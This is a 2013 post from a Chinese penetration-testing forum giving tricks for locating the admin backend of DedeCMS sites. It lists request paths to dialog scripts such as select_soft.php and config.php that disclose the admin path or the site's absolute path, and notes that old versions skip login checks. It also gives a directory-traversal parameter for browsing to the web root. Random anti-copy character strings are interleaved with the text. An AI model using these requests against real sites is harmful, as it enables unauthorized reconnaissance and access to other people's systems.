找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2155|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
1 x- U0 h; ?- r& _9 H% g/ _4 ^& `; _4 E" a8 m. Q
员帐号,新版本的就直接转向了后台.
$ i0 X& k9 O9 c' i$ y5 i$ E
! e  @/ k# g3 m* @* ?2.include/dialog/config.php会爆出后台管理路径
9 Y6 `( }# P" j
8 o$ @1 @8 E$ ?& S  B! L3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
" \* ?9 J" c5 e. T
- E3 l# \' ~+ `8 ^$ e* l, j3 ~" l: ?4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.0 B8 X' Z7 \( }& L" T( n' S
( Y) l, E5 |' y5 |" B" B5 r- w
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉; a6 V1 B/ E0 ^* f; e
7 ?/ u4 K1 |. B
到根目录去.不过这些版本的访问地址有些不同.
9 [. [2 O/ _% F# _5 F2 J地址为require/dialog/select_soft.php?activepath=/././././././././
1 E+ {( J% }, V$ _# f) w  F4 x, f. u( o  N
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
+ ~+ B" u$ W/ k% I  F9 p' N存在相同问题的文件还有
# W' M. b; t& e2 D& ?# @* U8 uinclude\dialog\select_images.php& h/ k0 u7 r% I4 x) E$ I: E) r
include\dialog\select_media.php% V+ r  y. E3 }' ~' R1 c: h5 [& @) d
include\dialog\select_templets.php​
  `$ G4 v9 T4 P/ z4 M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表